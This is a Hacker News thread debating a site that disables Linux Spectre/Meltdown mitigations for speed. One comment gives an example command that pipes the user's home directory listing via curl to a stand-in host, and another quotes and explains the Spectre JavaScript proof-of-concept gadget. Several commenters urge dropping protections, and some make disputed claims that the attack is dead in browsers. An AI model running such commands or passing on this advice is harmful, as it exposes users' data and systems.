TBH it's entirely in character with "make X Y again" to give some recommendations that are super straightforward and sound appealing, don't make a case that X is in fact no longer Y, completely ignore why those recommendations haven't been implemented thus far, and don't spend any time thinking about whether there's even the slightest downside to those recommendations (which are in fact super dangerous/harmful).
The most essential person in kernel dev linked this just the other day, presumably seriously, in reply to an AMA question:
75 points · 2 days ago
If my environment doesn't need to worry about
executing malicious code and I want syscalls to
happen as fast as possible, is there a single/simple
option to disable all the performance killing
hardware mitigations?
gregkh Verified 183 points · 2 days ago
https://make-linux-fast-again.com/
Sure. That's a very big "if," and the most essential person in kernel dev has the ability to make that the default if he wants. There's a reason he hasn't.
(If your environment actually doesn't need to worry about executing malicious code and you want to make syscalls as fast as possible, try a unikernel or implementing your code in a kernel module. Or, depending on what you're doing, try kernel bypass to get to the devices you care about and use something like https://lwn.net/SubscriberLink/816298/4aed890ee2dbffff/ to pin your user code to certain cores and get the kernel completely out of the way. Having to transition out of user mode to access hardware instead of making plain function calls, having to change page tables between processes, etc. are all performance-killing mitigations of their own. http://www.csl.cornell.edu/~delimitrou/papers/2019.asplos.xc... found a 27x performance improvement by getting rid of the privilege boundary between userspace and kernelspace - if you really care about performance and really don't care about malicious code, why would you leave a 27x speedup on the table and worry about a small percentage improvement from these flags??)
Telling people to write in kernel mode if they care about performance isn't realistic. For most people that would mean completely rewriting their code from scratch, foregoing high-level software stacks and languages, giving up on most databases, giving up on all manner of tools and techniques for high-velocity software development, giving up fault tolerance, dealing directly with fiddly hardware issues (when do I need a TLB shootdown?), etc.
Whereas disabling spectre mitigations is a one-line config change.
For use cases where local system security really doesn't matter (of which there are a lot, let's be honest), a one-line config change for a 25% (or whatever it is now) performance boost is a pretty damned good deal.
I'm not sure I agree that cases where local system security really doesn't matter and performance matters are that plentiful, but I am happy to be convinced otherwise. In particular, just about any personal computing context doesn't count - you'd have to not run mutually-untrusted third-party code. That rules out web browsers with JavaScript, that rules out Android/iOS-style independent apps, etc. Sure, if you use the web without dynamic content and you use local office suites you're fine, but on the other hand, you don't really care about performance - a 486 will deliver enough performance to read textual content and run a word processor and spreadsheet.
Gaming is a context where you care about performance and you aren't using multiple apps at once, but (and I admit this is a bit of a naive guess) I'd be surprised if it's syscall-bound. It seems like performance is likely to be I/O-bound (getting assets from disk into memory), CPU-bound, and GPU-bound, but are you really making large numbers of syscalls? (Maybe this matters in online gaming?)
So that leaves basically some specific server workloads, and at that point I think some of these techniques start to be realistic. Pinning your work onto a core and using kernel-bypass networking is a pretty straightforward technique these days. It's not quite as easy as using the kernel interfaces, but it's pretty close, and it's definitely worth investing some engineering effort into if you care about performance - you can get much more than 25% speedups.
I agree that writing in kernel mode is generally unrealistic (although if you're writing a kernel module for Linux, you still don't need to care about fiddly hardware issues - you've got the rest of Linux still running). Mostly I'd like to see more work like the paper I linked - there should be a standard build of Linux which has hardware privilege separation turned off for use in the cases where you actually can avoid hardware privilege separation (single-user VMs on cloud hosts, single-user data crunching machines, dedicated single-tenant database servers, game consoles without web browsers, ebook readers without web browsers, etc.), or at least a flag to spawn a process and leave it in ring 0. If the use cases are plentiful, this seems like it would be valuable for lots of people - and it'd also make it clear that this generally isn't an option you want on personal computers. (But I think the reason this hasn't been done in the last several decades is that there aren't actually that many use cases that are both genuinely single-user and syscall-bound.)
If you think a 486 is sufficient for reading textual content and running a word processor and spreadsheet, you haven't been paying attention to software bloat. A 486 would have a hard time just booting a modern OS, never mind the application software.
> So that leaves basically some specific server workloads,
The vast majority of servers don't run any untrusted code. Servers tend to do lots of syscalls for network I/O.
> Gaming is a context where you care about performance and you aren't using multiple apps at once, but (and I admit this is a bit of a naive guess) I'd be surprised if it's syscall-bound.
I would expect that interfacing with the GPU involves a fair number of syscalls -- but admittedly I'm also guessing.
> single-user VMs on cloud hosts, single-user data crunching machines, dedicated single-tenant database servers, game consoles without web browsers, ebook readers without web browsers
This is a lot of cases. I'd love to get 25% perf back on postgres, or 25% back on my air-gapped DAW, etc. etc.
Benchmark it - your air-gapped DAW is almost certainly spending very little of its time making system calls, and depending on workload, your Postgres probably isn't either. You'll get 25% back on syscall-heavy workloads but your workloads probably aren't syscall-heavy.
While we're being honest, how many programs that get written are so desperate for performance that the only thing left to do is turn off security? And are the people who are able to even make this determination the kind of people for whom making a kernel module is unrealistic?
I didn't ignore it. My point is, the kind of people who truly need this kind of performance are already translating hotspots to assembler and so on, a kernel module is plenty practical for them. For nearly all computer users there is no excuse for turning off these mitigations.
I don't know. If I'm running an application server with only my own code on a dedicated server, and I can flip some switches to make it go faster, then that's pretty nice, no? Might save me from upgrading to a bigger (pricier) server. What am I missing?
I mean, sure, that site is nuts, it sorely needs documentation. But not every scenario needs Spectre protection.
The problem with the scenario you describe is: how will you ensure that no one ever forgets that this server is vulnerable and can never be used for certain things? And everyone on here advocating turning off the mitigations is assuming the only exploits are the ones we know about. But when has that ever been the case. If more people turn off the mitigations black hats will be invested in finding ways to exploit it we haven't realised before.
Correct, but 'geofft's criticism of it isn't great, in my opinion. Reading it makes it obvious what it does, and only a fool would disable security mitigations in a situation where it mattered. The link has significant value in being a quick and easy way to direct people to information, and it seems nonsensical to criticize it for things which don't particularly apply.
> only a fool would disable security mitigations in a situation where it mattered.
Are we reading the same HN threads on this page? I'm seeing people who I don't consider to be stupid, who obviously have some Linux knowledge, still advocating that user accounts are a waste of time for most desktops.
If anyone is smart enough and knows enough about Spectre/Meltdown to understand the risks they're taking, they are also smart enough to search online how to disable the kernel protections. The commands aren't hard to find.
If anyone is not smart enough find that information online for themselves, they also don't have enough knowledge to make an informed decision about whether or not it's safe for them to run.
In both cases, there is value in forcing users to display a modicum of knowledge about even just the fact that Spectre/Meltdown exist before we give them a command to run that turns off an important security setting. Anyone who knows anything about Spectre/Meltdown already knows that the mitigations affect performance. They should already know what to search for online without the aid of no-context commands being pasted at the top of HN.
Are we reading the same HN threads on this page? I'm seeing people who I don't consider to be stupid, who obviously have some Linux knowledge, still advocating that user accounts are a waste of time for most desktops.
A fool isn't necessarily stupid: plenty of people have knowledge yet terrible judgement.
If anyone is smart enough and knows enough about Spectre/Meltdown to understand the risks they're taking, they are also smart enough to search online how to disable the kernel protections. The commands aren't hard to find.
If anyone is not smart enough find that information online for themselves, they also don't have enough knowledge to make an informed decision about whether or not it's safe for them to run.
In both cases, there is value in forcing users to display a modicum of knowledge about even just the fact that Spectre/Meltdown exist before we give them a command to run that turns off an important security setting. Anyone who knows anything about Spectre/Meltdown already knows that the mitigations affect performance. They should already know what to search for online without the aid of no-context commands being pasted at the top of HN.
You're considering it as advice, when really it should be considered more like a doi.
> A fool isn't necessarily stupid: plenty of people have knowledge yet terrible judgement.
Then I'm not sure why you disagree with my criticism - I'm claiming that this page appeals to people who have knowledge in this matter but have not done the deep thinking to have wisdom in this matter. There are plenty of smart people who find "Make X Y again" for other values of X and Y appealing.
I'm claiming it functions more like a doi or other identifier than a sales pitch. I don't think there's a ton of deep thinking involved: there will always be someone who's willing to run a web browser as root on their main system; you can't stop people who are set on something foolish from doing it, but if you can make it more convenient for people who have valid reasons, why not?
This all might be a bit too much serious thought for what was intended as a joke initially (the site, not my comments), though.
Android differentiates between user processes and root processes. I'm pretty sure iOS does as well, although maybe they've coded it as something weird.
I'm not seeing people here arguing that Linux could get by with only supporting 1 user account. I'm seeing people argue that the biggest reason they avoid running as root is just because userland applications complain about it. It's very difficult to do sandboxing if there isn't some kind of differentiation between a privileged and unprivileged process.
Regardless, Linux also doesn't really have good sandboxing by default, so I'm not completely sure what you're getting at. It's still a bad idea for people to run a Linux system as root.
> Reading it makes it obvious what it does, and only a fool would disable security mitigations in a situation where it mattered.
I disagree. Most users do not understand how speculative side channels work or how they might be affected; many people's experience with Meltdown and Spectre is "my games got slower because of some magical speculative stuff that I don't really understand". Making an informed decision on this is hard.
The average Linux user will not understand the implications. Heck most don't even know the security trade-offs of X11 (which are relatively simple to discover and understand).
Leave the HN bubble and go to an average Linux forum. You would be surprised what kind of advise people give or what people are willing to copy and paste into their terminal ;).
This is not meant as a criticism. Most people, including many Linux users, just use their computer as a tool and will just do anything to get it running as they want.
Most offline systems, and many systems used only for using trusted code (which obviously bars anything with a web browser, and most internet-connected personal computing devices, among other things). Applications that equate roughly to "Scientific number-crunching" for example are generally systems where security doesn't matter much.
There's a case to be made for gaming, and the mitigations if I remember correctly definitely ding performance on quite a few games, but because most computers used for games have significant amounts of sensitive information on them, among other things, I don't think it really holds well.
Benchmarks (I really dislike linking to this site, but given it did a bunch of benchmarks, it's not the worst thing, I guess):
'Up to 50% performance loss!' is obviously clickbait, and I disagree with a lot of the wording & conclusions & so on, but there's definitely some workloads where the trade-off makes sense.
Warning about those benchmarks, though: they're of a rather old kernel version, I imagine they tank performance less now. However, given that 5x has been performing way worse to my knowledge than 4x, 4x is probably what most people would be using for these sorts of things.
Are systems used for "scientific number-crunching" really applicable in this case? While some departments may have those on a separate network, not connected to the internet at large, I have never heard of a system employed for research tasks being completely air gapped. Otherwise, accessing and working on data would be prohibitively harder. Would such a trade-off be worth the potential gains by deactivating mitigations?
Also, may I ask why you dislike Phoronix? I personally enjoy their articles and the benchmark suite they have developed seems very well-rounded and transparent. I wouldn't count the statement concerning the ~50% increase in time it takes to complete a certain task on 4.20 as clickbait, considering it was never used in the linked articles title to hock readers and gain clicks.
Honestly, I have yet to see a large and popular enough use-case that allows for a both completely air gapped system, whilst also heavily benefiting from disabling mitigation to such an extent, that an admin couldn't just lock up the flags required. If I, as an admin, made the conscious choice of going so far as to disable these patches, I would also want to at least re-read whether this is truly significantly advantageous, rather than copying a line from a website with no context or further information on the current state and impact on performance.
It'd be nice to be able to easily boot into, or toggle into, a performance optimized, disabled mitigations environment to do something while offline.. many computer uses don't require being connected to other computers. I've gotten into the habit of hotplugging my Ethernet connection, personally.
You can actually do that fairly easily, just add the parameters linked to a second boot entry in GRUB.
However, I would very much not advise doing so, as I still am unaware of any task that can both, be done without the need for a network connection, while also being significantly slowed down by the mitigations, after recent improvements to the kernel and software. Basically, the potential benefit is very low in a lot of tasks, whilst requiring additional security measures (ideally fully air-gapped) and that you reboot the system every time you'd do such a task.
Also note that, in theory, just being temporarily offline may not shield from being exploited fully.
As an example (the only case that I've identified personally), if your curious, I have a (windows; Intel q6600) box that I use for gaming occasionally. Single player game I like, Total War: Shogun 2, runs at about 55 fps (benchmark) pre-Meltdown/Spectre/etc. Now it gets ~22 fps. I can use https://www.grc.com/inspectre.htm to toggle some mitigations to get it playable again.
Is there a possibility this whole project is in jest? It's called "Make Linux Fast Again", and it deliberately disables reasonable security measures to achieve its goal. Could be a political statement in the negative!
The quality of comments on hacker news is due to the high bar for thoughtfulness and respect. Not from a restriction blocking any "political" discussion.
The linked content (disable security features to improve performance) is very clearly a relevant topic for hacker news and the apparent association between the linked domain and Trump's infamous catch-phrase seems like an intentional choice that is worth discussing.
I think it is a real problem that someone should try to solve. I visit a good number of expert communities and they all tend to be highly on topic. This is a good thing without question but I've often noticed the community is completely oblivious to what happens outside their bubble. I suspect most of the accidental battles are from being years behind on the discussion with the people they've talked with every day for the last decade or so.
I don't claim to have a solution. Programming philosophy or Programming politics do not seem very attractive but I do suspect there to be a big adventure behind those curtains. It's not like code is not political, lacks a philosophy or ideology. But the best we could do was "stop spying on me!"? hah
Yes, that's the point of this site - if your workflow is hurt by the perf impact of mitigations and SPECTRE & friends are not a credible attack, for instance because you disable JS by default, then you can just curl and pipe this to your kernel parameters
To be clear, SPECTRE leaks privileged memory at an OS-level -- up to in some cases allowing arbitrary virtual memory reads.
While Javascript is the most likely attack vector for most people, you should not use this command on a system that's running untrusted code from anywhere in any context, and you should consider moving sensitive information like passwords off of the computer.
I use uMatrix to disable Javascript by default on every site I visit, and I still would not feel safe running this command on anything other than a single-purpose device.
That's not to say that there would never be a good reason to run it. A very imprecise, easy test I would propose is, "is your Linux system vetted enough or just unimportant enough that you would feel comfortable getting rid of users and running all of your software as root?" In which case, SPECTRE & friends is probably not a credible threat to you on that machine.
Only if you are using multiple accounts and you are concerned about privilege escalation. But let's be honest, most people use only one user account, with sudo rights, and probably without sudo password because inserting them 1000 times a day is a pain.
Thus every program without doing anything can access everything, it just needs to spawn a process to read stuff arount the FS, or in the assumption that yu have sudo without password, just gain root access and read /dev/mem. That is more simple than doing a SPECTRE attack.
So who needs these mitigations? Who runs containers or sandbox where you want untrusted code to be isolated. Browsers are an example, but they have specific mitigations anyway, and doing an attack from JS is not that simple really. So really I'm not so worried about SPECTRE for a typical desktop usage.
Of course if we talk about servers they are very important.
> But let's be honest, most people use only one user account, with sudo rights, and probably without sudo password because inserting them 1000 times a day is a pain.
The solution is to teach those users how to use sudo properly, not to teach them to be even more insecure than they already are.
It's like saying, "I don't need to wear a seatbelt because I already drive my car at 90mph everywhere, so the seatbelt wouldn't make a difference in a crash anyway."
If you have sudo set up without a password, fix that crud! This is not a new concept, the Linux community has been warning people about unprotected root access for over a decade.
The concept is crud. For a personal computing device at least. Why should i bother moving along lines which have nothing in common AT ALL with personal use, instead historically shaped for reasons of accountabiliy and billing?
> you should not use this command on a system that's running untrusted code from anywhere in any context
I don't really understand this point.
Any program you download from the internet, say, VLC or Kodi or a game emulator or whatever, can already do `find $HOME | curl -F my.totally-legitimate.website` and read the memory of all the processes of your user with a script that'd involve `ps -u` and `/proc/yourpid/maps`, mitigations or not, unless you use something like QubesOS (but most people do not).
Leaking bits with spectre would be a super long process versus... just doing that if you could already get the user to download your code.
> Any program you download from the internet, say, VLC or Kodi or a game emulator or whatever, can already do `find $HOME | curl -F my.totally-legitimate.website` and read the memory of all the processes of your user
There are variants of Spectre and Meltdown that expose kernel memory. If you're really in a position where you don't think that makes a difference, then why are you messing around with user accounts in the first place? Why aren't you running all your software as root?
I'm not going to argue Linux sandboxing is awesome -- it's very clearly not. But user permissions are big part of what security we do have. Spectre/Meltdown also limit the effectiveness of the newer sandboxing features we're getting from packaging systems like Flatpack. Maybe you're not running any of that stuff on your system, but...
I'm seeing a lot of people here being kind of blasé about the potential risks, arguing that they only need to protect themselves from websites, and I am skeptical that all of those people actually understand the full extent of these vulnerabilities.
On a single owner desktop system, isn't kernel memory strictly less interesting than user memory, for reads? All of the important things, like passwords and emails and secret keys, are in user space memory or in the user readable file system, generally...
> Why aren't you running all your software as root?
A lot of software gets snippy when you try to run them as root. That said, the biggest advantage of non-root is protecting myself from fucking up my own system.
If somebody gets access to my user account, they can't change my system files, but they can literally buy an entire new PC with my money, on which they can then presumably change whatever system files they want. I hope that example outlines how pointless root protection is in a modern consumer PC.
> they can't change my system files, but they can literally buy an entire new PC with my money
This is a problem that's fixable with additional security additions, but only if you haven't granted everyone root access.
You can set up ssh with appropriate privileges and chown private keys so that they require a password to access. You can run certain programs like games as unprivileged users without full access to your $HOME directory. You can start using Flatpak and Wayland. Unless you have a Spectre/Meltdown vulnerability, in which case most of that is pointless.
I don't understand the mentality that says, "my system is broadly insecure, so I'd better make it impossible to secure." I mention this elsewhere[0], but a big part of getting to a secure Linux system is patching the holes we can right now.
> There are variants of Spectre and Meltdown that expose kernel memory. If you're really in a position where you don't think that makes a difference, then why are you messing around with user accounts in the first place? Why aren't you running all your software as root?
Only somewhat devil's advocate: Software running as root can accidentally delete important files. I run software as non-root to prevent myself from my silly mistakes. You don't accidentally leak information through SPECTRE.
> There are variants of Spectre and Meltdown that expose kernel memory. If you're really in a position where you don't think that makes a difference, then why are you messing around with user accounts in the first place? Why aren't you running all your software as root?
I'll be honest, because that's the default on Linux (I'd make the effort to do that for my personal things at least - I'd never do that on computers with shared accounts or with work-related data).
It's not that the vulnerability isn't dangerous. It's that there are already _so_ many other vulnerabilities that outside of maybe JavaScript it doesn't make a whole lot of difference. Desktop linux security is basically this: https://i.redd.it/bqk0cv1r56c41.png Why worry about a whole in the fence gate when anyone can just walk around it?
The problem is that there are like 4 or 5 efforts going on in Linux right now to make things more secure. But they're all kind of targeted, and we need all of them to coordinate with each other, so individually each of them gets dismissed because "what's the point of plugging one hole?"
People mention $HOME access. This is something that we're trying to solve with Flatpack: filesystem access should be sandboxed by default. But that requires coordination with desktop environments like Gnome, otherwise everyone just grants programs anything they want because the UX is bad.
And then on top of that we have X11, which is its own mess, and we're trying to address that with Wayland. But Wayland isn't perfect yet for desktop recording, and there's not a ton of effort from software like Emacs to get off of X and onto Wayland because of "what's the point?" arguments. So Flatpack becomes a lot less valuable because X11 keylogging is so easy.
Then we have just flat-out bad user security, where people are setting up sudo without a password. So process isolation becomes a lot less valuable because programs can just manipulate the raw filesystem.
And then we have Spectre/Meltdown leaking passwords, but who cares because "people don't set passwords anyway."?
And whenever a group of people get together and propose any fixes in isolation, there is inevitably someone in the Linux community who will stand up and say, "Look, Wayland is pointless because someone wrote a keylogger[0]. Why are we spending any time fixing this stuff?"
Imagine you are on a boat with 10 holes in the bottom, all of them leaking water. If you want to fix that problem, there is inevitably going to be a period where 5 of the holes are patched and 5 of them aren't. And if you get to that point and start re-opening the holes that did get patched, it's going to be very hard to make any more progress.
It's not that the desktop "linux" developers don't care about security. But there's simply not enough manpower behind it. The linux kernel is only secure because that's what the cloud companies with a shit ton of money care about. They don't care about desktop.
I don't think reality is quite like your little image here. There is no absolute security, ever, but we can create layers of difficulty for attackers as appropriate for our threat models. Someone with a reasonable amount of expertise and caution can use Linux on a personal computer in ways that make it very nearly impossible for a typical "criminal level" hacker (as opposed to nation-state level hacker) to steal information from them. Yes, that means not downloading arbitrary executables from the net, among other things, and certainly not running arbitrary code from the net like Javascript. When you do need to run something untrusted, run it isolated in a VM, etc. If you do these kinds of things, then it makes sense to also use stuff like Spectre mitigations.
That's not necessarily true, there's been several security layers added these past few years. The YAMA LSM prevents user processes from reading the memory of processes that are not its children. It's already enabled by default in Ubuntu (but not Fedora, they decided to keep it disabled by default so that user gdb still works).
There are definitely still holes in the Linux security model, especially regarding file access (any user process having access to all the user's files is far too broad), but that doesn't mean we should just leave known vulnerabilities open, especially since an attacker may not have all methods of attack available.
I would appreciate someone else who knows more than me about the current state of these attacks and more than me about Linux security in general answering this question. Take what I'm about to say with a grain of salt.
My understanding is that Firefox still reduces timer accuracy, Chrome did, but increased timer accuracy again after adding other protections. I'm not sure if Chrome's protections rely on Meltdown vulnerabilities being patched on the OS level or not. It's been a while since I checked back on what the status was there, so I might be wrong.
There are also some concerns about shared memory buffers, which is why I think some of the features around them haven't been enabled in WASM yet. I haven't checked the status on that stuff in a while either.
In any case, for a vulnerability of this scale I bias towards saying people should practice defense in depth. Sometimes browsers have bugs in them, and this would be a particularly bad one. And again, there are userland native apps and systems and package managers that people need to worry about that go beyond browsers.
Yes, but this doesn’t actually fix the issue; it just makes exploiting it harder. Fundamentally, even if you fudge clocks you can still average out things with enough measurements, and if you remove all of them you can busyloop and count iterations of that instead as a “timer”.
They had to disable shared memory APIs for threading in JavaScript, because those could be used to implement accurate enough "clocks". That was a temporary measure and last I checked some browsers enabled them again once the memory access itself was patched. So by removing the memory access patch you are once again fully vulnerable.
This just makes the attack harder, i was told. There are arguably plenty of ways to measure time within javascript without even a clock, you cannot disable that.
Reducing timer resolution was done early on as a quick reaction by browser developers when Spectre & Meltdown were first publicized.
All an attacker needs to do is distinguish between a cached and non-cached memory read - i.e., was accessing some variable "faster" or "slower". There are lots and lots of ways to measure this. A good whitepaper is "Fantastic Timers and Where to Find Them: High-Resolution Microarchitectural Attacks in Javascript".
The TLDR is that timer resolution reduction is ineffective as a speculative attack mitigation.
I thought your tone was fine, but the phrase "Yes, that's the point..." can sometimes (not always) be associated with a condescending, sometimes even impatient, tone. It's not intrinsic to the phrase, it depends on what the reader may associate with the phrase. (I'm also not saying this actually happened in this case, I'm just speaking generally.)
Agreed, and the part that may be difficult for a non-native speaker to get is what other words would give the same meaning but seem less confrontational: e.g. "Yes, that's the intent..." conveys the same meaning but with a milder tone. I think with "point" there's the suggestion of "You missed the point," which is an insult.
I think you're fine! But just to try and deconstruct... similar phrasing:
> Yes... that's the entire point of xyz -_-;
...is semi-frequently used to imply "what you said is obvious" with a sort of... dismissive undertone, which might've been what miles was reacting to. Breaking the phrase up a bit more and making it a bit more casual/chipper somehow feels harder to misinterpret this way? Even without resorting to emoji as I have here:
> Yep! That's the point of xyz :)
But I could see myself using your phrasing as a native speaker, so I wouldn't worry about it too much ¯\_(ツ)_/¯
> SPECTRE & friends are not a credible attack, for instance because you disable JS by default
That's... an extremely optimistic perspective on what's running on your system. Disabling JS in browser tab contexts (even if it's universal and not just "by default") is going to cover a pretty small percentage of SPECTRE et al. vectors.
Personal use usually involves a web browser, which usually executes untrusted javascript from the web. You won't find me disabling these mitigations on any of my workstations any time soon.
Yes, the original Javascript exploit from the paper still works, because the browser cannot mitigate this attack without just disabling parts of Javascript entirely which breaks Javascript.
With all current kernels built to mitigate these exploits, and all sane people running those kernels, there's no benefit in patching the browsers too, even if it were somehow possible, which for all intents and purposes it is not.
Well the link you provide doesnt use SharedArrayBuffer, it is used as part of the exploit if you read the original paper (as a method to make a high resolution timer)
You won't find a real world exploit that does something like reading a password, SSH key, etc. It would be like winning the lottery, then getting your money out 1 penny at a time for the next several decades. You can find "academic" PoC exploits that work under pristine conditions.
I'm not super familar with spectre, but i think the linked page is misinterpreting the vuln (hopefully someone will correct me if im totally out to lunch).
So the original js from the spectre paper was:
if (index < simpleByteArray.length) {
index = simpleByteArray[index | 0];
index = (((index * 4096)|0) & (32*1024*1024-1))|0;
localJunk ˆ= probeTable[index|0]|0;
}
The code looking a bit weird (all the |0) to ensure Chrome JITs it the correct way. My understanding of what happens, the loop goes a bunch of times while index is inside the simple byte array. After the last iteration, the processor speculatively executes the loop one more time than it should (branch misprediction). It eventually figures out the loop should end and undos the speculative execution. However that only happens after the loop has already started executing (where its not supposed to). During this improper execution, index is after the end of SimpleByteArray. index = simpleByteArray[index | 0] is then executed. index is now set to the value of some memory in the current process that the current JS is not supposed to access.
index = (((index * 4096)|0) & (3210241024-1))|0; is executed to spread the memory value out (we need all possible values to be in a separate cache line in probeTable later). We now execute localJunk ˆ= probeTable[index|0]|0;. localJunk is just there to prevent dead code elimination optimization. Since we are now indexing into probeTable at 4096 byte intervals, we have to fetch that value from memory. It then gets cached by processor. This all gets undone by the processor when it realizes that the branch was incorrect, except the cache changes are not undone. If we access anything else in the same 4096 bytes later on, the access is a tiny bit quicker.
The exploit is, that after all that setup, we try accessing each 4096 byte region of probeTable, to see which one is fastest. We can than conclude that was the value of index during the branch misprediction and thus the value of that byte of memory we aren't supposed to see.
If we do this a lot, we can read the rest of the process's memory. The hope is we will be able to find cookies related to other websites currently open, and then do evil things with them.
This attack no longer works because browsers disabled SharedArrayBuffer, which provided the really precise timer. The timing difference is very small so you need a very fine grained timer to make it work. It should also be noted that this variant of spectre is in-process only. Some versions of meltdown/spectre allow accessing memory of other processes, but as far as i understand this version is in process only.
I hope that made sense, and i hope i didnt screw that up.
Eh. The amount of performance you sacrifice in order to mitigate the very small chance of actually running across any javascript in the wild that a) successfully exploits you, and b) actually retrieves anything worthwhile, just isn't worth it. It's such a tiny risk that it's really only worth mitigating against if you're paranoid or handling particularly sensitive information.
Again, JS can no longer perform this exploit. Browser vendors have disabled (made inoperable) high resolution timing. It's now at 1ms resolution. Not enough timing resolution to mount the attack.
postMessage cannot provide a reliable timing signal since it goes on the task queue on the receiving end (in the main thread) along with other pending events, and even if there were no other events, there is latency noise in postMessage due to the fact that the web worker is not the only thread running on the CPU. Some suggest that the attack would only take more time as the attacker has to collect a bigger sample, and factor out the noise, but I haven't seen a public exploit based on that.
the minimum essential behavior to implement a feature is one that takes into consideration keeping the user safe from attacks... you could call that bloat, but I wouldn't be sarcastic about it: if you can make the mitigations more concise, you can contribute your ideas, no one stopping you.
Shared Array Buffers are enabled by default in Chrome now, because Chrome has separate mitigations against Spectre.
To the best of my knowledge, it does not have mitigations against Meltdown because it assumes those protections will be implemented at the OS/firmware level, but if anyone has more experience or insight than me on that front, they're welcome to correct me.
In any case, you're making a kind of wild assumption that the type of user who disables a security feature from their OS to get a speed increase won't also likely disable security features like Site Isolation in their browser when they hear that those features increase Chrome's memory usage by somewhere between 10-20%.
So there's a known exploit in CPUs and your response is "prove to me it can be exploited or I won't use mitigations"? In 2020 no less? What can you possibly be doing that would even notice the slowdown from these mitigations? Virtually everything we actually do will be bottlenecked by something else long before the CPU becomes an issue.
In my mind javascript is so many layers removed from machine code that it would be insanely hard to even break out of the chrome sandbox let alone glean anything useful from other running processes.
"We were not able use these techniques in Firefox, as they recently reduced the timer resolution to 2ms. The techinque presented here is potentially relevant even for this timer resolution, but some parameter tweaking is required.?"
AFAIK, Chrome's highest resolution is also in the ms range.
I have some thoughts, too, but thoughts don't amount to a working exploit. Show me a currently working exploit, that is in the open. As far as state actors developing such exploits, there are a ton of holes in that scenario at every layer in the stack.
HN wouldn't let me nest another response. This is in regards to "Timers aren't necessarily even a requirement"
<<you can busyloop and count iterations of that instead as a “timer”>>
Assuming you're the only job running on the CPU, which is not the case. Threads are not running continuously. But again, if there is a working exploit in the browser then show us. Talk is cheap.
I am aware that threads don't run continuously; scheduling just makes this worse just like timer jittering does. Sadly, I'm not the kind of person who can drop full, working exploits against unpatched browsers in response to Hacker News comments; I just have a passing interest in the field :(
performance.now resolution in Chrome is between 1 and 2 ms, I believe, with jitter. If they have a working POC for Chrome why not demonstrate the full exploit and force the Chromium team to rethink their mitigations? Lots of people talking possibilities but zero working exploits in the open. That's not a good ground for rational debate.
Timers aren't necessarily even a requirement to exploit Spectre: https://news.ycombinator.com/item?id=22831067. It's pretty hard to protect against this in general unless you generate retpolines.
I mean, its pretty obvious that enabling an option named no_spectre_v1 (and v2) is going to disable spectre mitigation. I feel like nobody should act shocked by this.
https://gist.github.com/rizalp/ff74fd9ededb076e6102fc0b636bd...
https://securitronlinux.com/bejiitaswrath/how-to-get-a-nice-...
https://www.phoronix.com/scan.php?page=news_item&px=Spectre-...